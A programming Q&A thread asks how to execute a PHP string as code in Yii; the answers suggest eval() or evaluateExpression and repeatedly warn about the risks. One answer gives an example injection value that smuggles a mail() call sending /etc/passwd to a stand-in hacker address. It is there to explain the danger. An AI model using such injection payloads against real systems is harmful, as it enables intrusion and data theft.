# Convert string to php action/function

Tags: php, yii

I'm using Yii framework.
I want to make a php string into php action.

```
$var = 'echo "hello";';
//Something to do to run $var
```

I want to print $var how can I do that?
There is a simple parse php from string option on Yii framework?

Comment: Do you really want to print `$var` or to echo 'hello'? The most dangerous function in PHP will do this, but it's the one that will allow abuse if you use it with user-generated strings

Comment: I want to make $var action so its should display hello.

Comment: Take heed of any warnings when using eval(), you're almost certainly leaving your site open wide open to intentional or even accidental abuse. This is a back door for anyone to run malicious code, or to crash your server; and is rightly disabled by many ISPs

Comment: I'm trying to pass an function something like 
 $expression[0] = 'Yii::app()->user->isAdmin()',
eval return me only false and null without any thing related to the function.

Answer (score 2):

You *may* use [eval()](http://php.net/manual/en/function.eval.php) function. But, *eval is evil* in many cases and generally such way of coding makes code harder to follow and debug. Beware for potential unsafe input from user, because, if, for instance, you do

```
eval('echo "$var"')
```

and $var was set directly from $_POST, one may set 
`$var='lol"; mail("hacker@somewhere.com", "Some passwords", "/bin/cat /etc/passwd");'` (provided, that webserver is under user that may have access to such functions and directories; even is not, it gives a plenty of opportunities to exploit such vulnerability). So, *generally* eval is bad idea, but sometimes it is the only solution. Anyway, be very careful.

Answer (score 0):

**eval** — Evaluate a string as PHP code

Evaluates the given code as PHP.

> **Caution**
>   The eval() language construct is **very dangerous** because it allows execution of arbitrary PHP code. **Its use thus is discouraged.** If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

http://php.net/manual/en/function.eval.php

Answer (score 0):

```
$this->evaluateExpression($var);
```